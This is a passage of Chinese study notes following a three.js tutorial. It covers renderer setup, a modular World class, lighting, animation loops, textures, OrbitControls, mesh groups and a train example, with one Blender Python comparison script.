          渲染器创建的 <canvas> 元素可以通过 renderer.domElement 访问。这行代码将这个 <canvas> 元素添加到之前指定的 HTML 容器中,使得渲染的 3D 场景能够显示在网页上的该容器内。

        • renderer.render(scene, camera);

          最后,使用 render 方法渲染场景。这个方法接受两个参数:scene(场景)和 camera(摄像机)。场景包含了所有要渲染的 3D 对象,而摄像机定义了观察场景的视角。调用这个方法时,Three.js 会根据提供的场景和摄像机参数,计算并绘制最终的图像到 <canvas> 元素上。

    1
    2
    3
    4
    5
    6
    7
    const renderer = new WebGLRenderer();
    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);

    container.appendChild(renderer.domElement);

    renderer.render(scene, camera);

    演示

    我想,这段代码在 Blender 里的实现:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    import bpy
    import numpy as np

    # 删除默认场景中的所有物体
    bpy.ops.object.select_all(action='SELECT')
    bpy.ops.object.delete(use_global=False)

    # 设置使用 Cycles 渲染引擎,也可以设置为'Eevee'
    bpy.context.scene.render.engine = 'CYCLES'

    # 获取当前世界
    world = bpy.data.worlds['World']
    # 确保使用节点
    world.use_nodes = True
    # 获取节点树和节点
    nodes = world.node_tree.nodes
    # 清除所有现有节点
    nodes.clear()
    # 创建一个新的背景节点
    bg_node = nodes.new(type='ShaderNodeBackground')
    # 设置背景颜色为天蓝色
    bg_node.inputs[0].default_value = (135/255, 206/235, 235/255, 1) # RGBA
    # 创建一个世界输出节点
    world_output_node = nodes.new(type='ShaderNodeOutputWorld')
    # 链接背景节点到世界输出节点
    links = world.node_tree.links
    link = links.new(bg_node.outputs[0], world_output_node.inputs[0])

    # 创建一个立方体
    bpy.ops.mesh.primitive_cube_add(size=2, location=(0, 0, 0))
    # 获取刚刚添加的立方体对象
    cube = bpy.context.object
    # 创建一个新的材质
    mat = bpy.data.materials.new(name="CubeMaterial")
    # 设置材质的基础颜色
    mat.diffuse_color = (68/255, 170/255, 136/255, 1) # RGB + Alpha
    # 将材质分配给立方体
    if not cube.data.materials:
    cube.data.materials.append(mat)
    else:
    cube.data.materials[0] = mat

    # 添加摄像机并直接获取引用
    bpy.ops.object.camera_add(location=(0, 0, 10))
    camera = bpy.context.object # 获取刚刚添加的摄像机对象

    # 设置摄像机的 fov, near 和 far 参数
    camera.data.angle = 35 * (np.pi / 180) # Blender 中使用弧度,Three.js 使用度
    camera.data.clip_start = 0.1
    camera.data.clip_end = 100

    # 摄像机位置已经在添加时设置,这里不需要重复设置
    # camera.location = (0, 0, 10)

    # 设置渲染分辨率
    bpy.context.scene.render.resolution_x = 1848
    bpy.context.scene.render.resolution_y = 1206
    bpy.context.scene.render.resolution_percentage = 100

    Blender

    1.3 介绍世界应用程序

    这章主要是将之前的代码模块化。

    模块化

    获取 container,导入 World.js

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import { World } from './World/world.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // 1. Create an instance of the World app
    const world = new World(container);

    // 2. Render the scene
    world.render();
    }

    // call main to start the app
    main();

    把之前定义摄像机、创建立方体、设置场景环境、渲染器、窗口适应之类的全扔进去。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';

    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    // These variables are module-scoped: we cannot access them
    // from outside the module
    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();

    scene.add(cube);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    渲染器系统:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import { WebGLRenderer } from 'three';

    function createRenderer() {
    const renderer = new WebGLRenderer();

    return renderer;
    }

    export { createRenderer };

    场景组件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import { Color, Scene } from 'three';

    function createScene() {
    const scene = new Scene();

    scene.background = new Color('skyblue');

    return scene;
    }

    export { createScene };

    相机组件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import { PerspectiveCamera } from 'three';

    function createCamera() {
    const camera = new PerspectiveCamera(
    35, // fov = Field Of View
    1, // aspect ratio (dummy value)
    0.1, // near clipping plane
    100, // far clipping plane
    );

    // move the camera back so we can view the scene
    camera.position.set(0, 0, 10);

    return camera;
    }

    export { createCamera };

    立方体组件,它包括创建 几何体、材质和 网格。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import { BoxBufferGeometry, Mesh, MeshBasicMaterial } from 'three';

    function createCube() {
    // create a geometry
    const geometry = new BoxBufferGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = new MeshBasicMaterial();

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    return cube;
    }

    export { createCube };

    使得场景可以占据整个窗口的大小:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    class Resizer {
    constructor(container, camera, renderer) {
    // Set the camera's aspect ratio
    camera.aspect = container.clientWidth / container.clientHeight;

    // update the camera's frustum
    camera.updateProjectionMatrix();

    // update the size of the renderer AND the canvas
    renderer.setSize(container.clientWidth, container.clientHeight);

    // set the pixel ratio (for mobile devices)
    renderer.setPixelRatio(window.devicePixelRatio);
    }
    }

    1.4 基于物理的渲染和照明

    three.js 也是使用**基于物理的渲染 (PBR)**的。

    根据之前模块化后的程序,继续修改:

    告诉渲染器启动基于物理的渲染。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    function createRenderer() {
    const renderer = new WebGLRenderer({ antialias: true });

    renderer.physicallyCorrectLights = true;

    return renderer;
    }

    export { createRenderer };

    定义一个灯光:

    • 光强设为 $8$
    • 位置在 $(10, 10, 10)$,照向原点
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import { DirectionalLight } from 'three';

    function createLights() {
    // Create a directional light
    const light = new DirectionalLight('white', 8);

    // move the light right, up, and towards us
    light.position.set(10, 10, 10);

    return light;
    }

    export { createLights };

    scene.add() 里给场景添加光源!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';
    import { createLights } from './components/lights.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    // These variables are module-scoped: we cannot access them
    // from outside the module
    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    演示

    1.5 变换、坐标系和场景图

    emmm 跟 Unity 里差不多吧。

    cube.js 中可以修改 cube 的 positionrotationscale

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    import {
    BoxBufferGeometry,
    MathUtils,
    Mesh,
    MeshStandardMaterial,
    } from 'three';

    function createCube() {
    const geometry = new BoxBufferGeometry(2, 2, 2);

    const material = new MeshStandardMaterial({ color: 'purple' });

    const cube = new Mesh(geometry, material);

    cube.position.x = -0.5;
    cube.position.y = -0.1;
    cube.position.z = 1;

    // equivalent to:
    // cube.position.set(-0.5, -0.1, 1);

    cube.scale.x = 1.25;
    cube.scale.y = 0.25;
    cube.scale.z = 0.5;

    // equivalent to:
    // cube.scale.set(1.25, 0.25, 0.5);

    // to rotate using degrees, they must
    // first be converted to radians
    cube.rotation.x = MathUtils.degToRad(-60);
    cube.rotation.y = MathUtils.degToRad(-45);
    cube.rotation.z = MathUtils.degToRad(60);

    return cube;
    }

    export { createCube };

    还可以把对象放在其他对象中,作其子对象:

    套娃!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    scene.add(mesh);

    // the children array contains the mesh we added
    scene.children; // -> [mesh]

    // now, add a light:
    scene.add(light);

    // the children array now contains both the mesh and the light
    scene.children; // -> [mesh, light];

    // now you can access the mesh and light using array indices
    scene.children[0]; // -> mesh
    scene.children[1]; // -> light

    1.6 使我们的场景具有响应性(以及处理 Jaggies)

    抗锯齿

    renderer.js 中启用抗锯齿:

    1
    const renderer = new WebGLRenderer({ antialias: true });

    无缝处理浏览器窗口大小变化

    修改 resizer.js

    • setSize 封装成一个函数,当用户改变窗口大小(触发 window.addEventListener('resize', () => {});)时,重新 setSize()
    • 定义一个 onResize() 函数,便于引用的时候重写它。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    const setSize = (container, camera, renderer) => {
    camera.aspect = container.clientWidth / container.clientHeight;
    camera.updateProjectionMatrix();

    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);
    };

    class Resizer {
    constructor(container, camera, renderer) {
    // set initial size on load
    setSize(container, camera, renderer);

    window.addEventListener('resize', () => {
    // set the size again if a resize occurs
    setSize(container, camera, renderer);
    // perform any custom actions
    this.onResize();
    });
    }

    onResize() { }
    }

    export { Resizer };

    修改 World.js

    • 重写 onResize() 的逻辑,窗口变换时,重新渲染画面:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';
    import { createLights } from './components/lights.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    resizer.onResize = () => {
    this.render();
    };
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    演示

    1.7 动画循环

    创建一个 Loops.js 用于循环:

    • constructor() 构造函数:
      • camera 摄像机。
      • scene 场景。
      • renderer 渲染器。
      • updatables 要在循环中更新的对象的列表。
    • start() 使用 this.renderer.setAnimationLoop(() => {}); 开启循环。
      • this.tick(); 开启计时器。
      • this.renderer.render(this.scene, this.camera); 循环中不断渲染帧。
    • stop() 清空循环:this.renderer.setAnimationLoop(null);
    • tick()
      • const delta = clock.getDelta(); 用于衡量渲染渲染一帧花了多少时间(单位:秒)。
      • 随后调用 this.updatables 里物体的 tick()(类似 Unity 里的 Update())。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    import { Clock } from "three";

    const clock = new Clock();

    class Loop {
    constructor(camera, scene, renderer) {
    this.camera = camera;
    this.scene = scene;
    this.renderer = renderer;
    this.updatables = [];
    }

    start() {
    this.renderer.setAnimationLoop(() => {
    // tell every animated object to tick forward one frame
    this.tick();

    // render a frame
    this.renderer.render(this.scene, this.camera);
    });
    }

    stop() {
    this.renderer.setAnimationLoop(null);
    }

    tick() {
    // only call the getDelta function once per frame!
    const delta = clock.getDelta();

    // console.log(
    // `The last frame rendered in ${delta * 1000} milliseconds`,
    // );

    for (const object of this.updatables) {
    object.tick(delta);
    }
    }
    }

    export { Loop };
    • import { Loop } from './systems/Loop.js'; 导入相应 JS。
    • let loop;loop = new Loop(camera, scene, renderer); 将循环创建为模块作用域变量,如 camerarendererscene 一样,因为我们不希望从 World 类外部访问它。
    • loop.updatables.push(cube);cube 压入 loop.updatables 中,使其可以循环。
    • start()stop() 分别就是 loop 中的 start()stop()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    渲染的入口改为 world.start();

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import { World } from './World/World.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // draw the scene
    world.start();
    }

    main();

    定义 cube.tick:每秒旋转 $30^\circ$。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils } from 'three';

    function createCube() {
    // create a geometry
    const geometry = new BoxGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = new MeshStandardMaterial({ color: "purple" });

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    cube.rotation.set(-0.5, -0.1, 0.8);

    const radiansPerSecond = MathUtils.degToRad(30);
    // this method will be called once per frame
    cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
    };

    return cube;
    }

    export { createCube };

    演示

    1.8 纹理映射

    给立方体贴图:

    立方体贴图

    修改 components/cube.js

    • 定义 createMaterial(),将控制物体材质的代码移到另一个函数中。
      • const textureLoader = new TextureLoader(); 定义一个加载纹理贴图的类。
      • const texture = textureLoader.load('./assets/textures/uv-test-bw.png',); 加载贴图,使其转换成能材质类读取的形式。
      • const material = new MeshStandardMaterial({map: texture,}); 定义材质。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils, TextureLoader } from 'three';

    function createMaterial() {
    // create a texture loader.
    const textureLoader = new TextureLoader();
    // load a texture
    const texture = textureLoader.load(
    './assets/textures/uv-test-bw.png',
    );
    // create a "standard" material using
    // the texture we just loaded as a color map
    const material = new MeshStandardMaterial({
    map: texture,
    });

    return material;
    }

    function createCube() {
    // create a geometry
    const geometry = new BoxGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = createMaterial();

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    cube.rotation.set(-0.5, -0.1, 0.8);

    const radiansPerSecond = MathUtils.degToRad(30);
    // this method will be called once per frame
    cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
    };

    return cube;
    }

    export { createCube };

    演示

    1.9 使用相机控制插件扩展 three.js

    本节将使用新插件:three/examples/jsm/controls/OrbitControls.js

    OrbitControls 是 Three.js 库中的一个辅助控制器,允许用户通过鼠标操作来旋转、缩放和平移场景中的相机,从而实现对场景的交互式查看。

    新插件!

    如果是本地加载的,还要修改一下 OrbitControls.js 里的导入逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import {
    EventDispatcher,
    MOUSE,
    Quaternion,
    Spherical,
    TOUCH,
    Vector2,
    Vector3,
    Plane,
    Ray,
    MathUtils
    } from '../../../build/three.module.js';
    • const controls = new OrbitControls(camera, canvas);:通过传入相机(camera)和 canvas 元素(canvas),创建了一个新的 OrbitControls 实例。
    • controls.enableDamping = true;:启用阻尼效果(惯性),使相机移动更加平滑自然。阻尼效果需要在动画循环中不断更新控制器状态。
    • controls.tick = () => controls.update();:在控制器上添加了一个名为tick的方法,这个方法简单地调用了controls.update()。这是因为当启用阻尼或自动旋转时,需要在每一帧更新控制器的状态以获得平滑的动画效果。在主动画循环中调用此tick方法可以达到这个目的。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';

    function createControls(camera, canvas) {
    const controls = new OrbitControls(camera, canvas);

    // damping and auto rotation require
    // the controls to be updated each frame

    // this.controls.autoRotate = true;
    controls.enableDamping = true;

    controls.tick = () => controls.update();

    return controls;
    }

    export { createControls };
    • import { createControls } from './systems/controls.js'; 导入 controls.js
    • const controls = createControls(camera, renderer.domElement); 将参数传给 createControls() 以激活辅助控制器。
    • loop.updatables.push(controls); 使得场景能够更新。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    演示

    按需渲染

    如果只使用相机控制插件,而不使用任何动画,那么使用按需渲染可以节约资源。

    • controls.addEventListener('change', () => {renderer.render(scene, camera);}); 设置事件监听,当用户控制相机时,重新渲染画面(而不是循环渲染画面)。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    // import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    // let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    // loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    controls.addEventListener('change', () => {
    renderer.render(scene, camera);
    });

    const cube = createCube();
    const light = createLights();

    // loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    // start() {
    // loop.start();
    // }

    // stop() {
    // loop.stop();
    // }
    }

    export { World };

    取消动画循环:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import { World } from './World/World.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // draw the scene
    world.render();
    }

    main();

    演示

    OrbitControls 配置

    可以通过设置参数以配置 OrbitControls 的功能:使用相机控制插件扩展 three.js | Discover three.js (discoverthreejs.com)

    1.10 环境光:来自各个方向的光照

    之前的立方体背面完全是黑色,这是因为缺少环境光。

    AmbientLight是在 three.js 中伪造间接照明的最廉价的方法。这种类型的光会从各个方向向场景中的每个对象添加恒定数量的光照。

    • const ambientLight = new AmbientLight('white', 2);

    来自 HemisphereLight的光在场景顶部的天空颜色和场景底部的地面颜色之间渐变。与AmbientLight一样,此灯不尝试物理精度。相反,HemisphereLight是在观察到在您发现人类的许多情况下创建的,最亮的光来自场景的顶部,而来自地面的光通常不太亮。

    • const ambientLight = new HemisphereLight('white', 'darkslategrey', 5, ); 创建一个 HemisphereLight 作为环境光
      • 天空颜色:white
      • 地面颜色:darkslategrey
      • 强度:5
    • return { ambientLight, mainLight }; 返回场景光与主光源。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import { AmbientLight, DirectionalLight, HemisphereLight } from 'three';

    function createLights() {
    const ambientLight = new HemisphereLight(
    'white', // bright sky color
    'darkslategrey', // dim ground color
    5, // intensity
    );

    const mainLight = new DirectionalLight('white', 5);
    mainLight.position.set(10, 10, 10);

    return { ambientLight, mainLight };
    }

    export { createLights };
    • const { ambientLight, mainLight } = createLights();:获取函数返回的光源对象。(是否可以修改成列表以减少耦合性?)
    • scene.add(ambientLight, mainLight, cube);:将这些光源和立方体对象加入场景。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight, cube);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    演示

    1.11 组织你的场景

    源教程使用的是 SphereBufferGeometry 在我这里似乎已经过期,应该改成 SphereGeometry。(用于创建球体形状的几何体)

    • const group = new Group(); 使用 Group 类创建一个新的组合对象 group。这个组合将用来容纳所有的球体,但它自身是不可见的。

    • const geometry = new SphereGeometry(0.25, 16, 16); 使用 Group 类创建一个新的组合对象 group。这个组合将用来容纳所有的球体,但它自身是不可见的。(就是个空节点)

    • group.add(protoSphere); 将这个 const protoSphere = new Mesh(geometry, material); 作为 group 的子对象。

    • for (let i = 0; i < 1; i += 0.05) {}:创建更多球体。

      • const sphere = protoSphere.clone(); 克隆球体 protoSphere,克隆的对象将具有与原始对象相同的位置、旋转和缩放。

        几何体和材质不是克隆的,它们是共享的。如果我们对共享材质进行任何更改,例如,更改其颜色,所有克隆的网格将与原始网格一起更改。如果您对几何体进行任何更改,这同样适用。(这跟 Unity 也可像)

        您可以给一个克隆一个全新的材料,而原来的材料不会受到影响。

      • 变换新的几何体的 transform

      • group.add(sphere); 将最后得到的几何体加入 group 中。

    • group.scale.multiplyScalar(2);:将整个组合的大小放大两倍。


    • const radiansPerSecond = MathUtils.degToRad(30); 尝试将整个 group 每秒旋转 $30^\circ$。
    • group.tick = (delta) => {group.rotation.z -= delta * radiansPerSecond;};:应用动画。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    import {
    SphereGeometry,
    Group,
    MathUtils,
    Mesh,
    MeshStandardMaterial,
    } from 'three';

    function createMeshGroup() {
    // a group holds other objects
    // but cannot be seen itself
    const group = new Group();

    const geometry = new SphereGeometry(0.25, 16, 16);

    const material = new MeshStandardMaterial({
    color: 'indigo',
    });

    const protoSphere = new Mesh(geometry, material);

    // add the protoSphere to the group
    group.add(protoSphere);

    // create twenty clones of the protoSphere
    // and add each to the group
    for (let i = 0; i < 1; i += 0.05) {
    const sphere = protoSphere.clone();

    // position the spheres on around a circle
    sphere.position.x = Math.cos(2 * Math.PI * i);
    sphere.position.y = Math.sin(2 * Math.PI * i);

    sphere.scale.multiplyScalar(0.01 + i);

    group.add(sphere);
    }

    // every sphere inside the group will be scaled
    group.scale.multiplyScalar(2);

    const radiansPerSecond = MathUtils.degToRad(30);

    // each frame, rotate the entire group of spheres
    group.tick = (delta) => {
    group.rotation.z -= delta * radiansPerSecond;
    };

    return group;
    }

    export { createMeshGroup };

    把之前的 cube 换成了 meshGroup

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createMeshGroup } from './components/meshGroup.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const meshGroup = createMeshGroup();

    loop.updatables.push(controls, meshGroup);
    scene.add(ambientLight, mainLight, meshGroup);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    演示

    1.12 使用内置几何体获得创意

    文件组织结构如下:

    • components/Train/:创建一个火车类
      • Train.js:组装火车,并设置轮子移动动画。
      • geometries.js:定义构成火车的组件。
      • materials.js:定义火车的材质。
      • meshes.js:设置火车的组建的 transform。
    • components/helpers.js:在场景中显示坐标系。

    文件结构

    • import {createAxesHelper, createGridHelper,} from './components/helpers.js';import { Train } from './components/Train/Train.js';:导入相关库。
    • const train = new Train();loop.updatables.push(controls, train);scene.add(ambientLight, mainLight, train);:定义火车类,加载动画并放置在场景中。
    • scene.add(createAxesHelper(), createGridHelper());:在场景中显示坐标轴。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    import { createCamera } from './components/camera.js';
    import {
    createAxesHelper,
    createGridHelper,
    } from './components/helpers.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';
    import { Train } from './components/Train/Train.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const train = new Train();

    loop.updatables.push(controls, train);
    scene.add(ambientLight, mainLight, train);

    const resizer = new Resizer(container, camera, renderer);

    scene.add(createAxesHelper(), createGridHelper());
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };
